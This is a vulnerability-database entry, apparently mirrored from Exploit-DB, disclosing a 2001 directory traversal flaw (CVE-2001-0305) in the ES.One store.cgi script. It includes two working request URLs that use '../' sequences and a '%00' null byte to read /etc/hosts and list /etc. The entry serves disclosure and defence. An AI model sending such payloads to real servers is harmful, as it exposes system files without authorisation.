Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbSlipyEDB-ID:20636
HistoryFeb 16, 2001 - 12:00 a.m.

thinking arts es.one 1.0 - Directory Traversal

2001-02-1600:00:00
slipy
www.exploit-db.com
28

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/2385/info

It is possible for a remote user to gain read access to directories and files outside the root directory of ES.One. Requesting a specially crafted URL by way of 'store.cgi', composed of '/../' sequences and appended with '%00' will disclose an arbitrary directory. 

http://target/cgi-bin/store.cgi?StartID=../etc/hosts%00.html

^^ = Will obviously open the hosts file.

http://target/cgi-bin/store.cgi?StartID=../etc/%00.html

^^ = Will obviously list the /etc/ directory.

Related

cvelist 1
nessus 1
nvd 1
cve 1
cvelist
cvelist
CVE-2001-0305
2001-04-04 04:00:00
nessus
nessus
Thinking Arts ES.One store.cgi StartID Parameter Traversal Arbitrary File Access
2001-03-25 00:00:00
nvd
nvd
CVE-2001-0305
2001-05-03 04:00:00
cve
cve
CVE-2001-0305
2001-05-03 04:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:20636
cvelist1nessus1nvd1cve1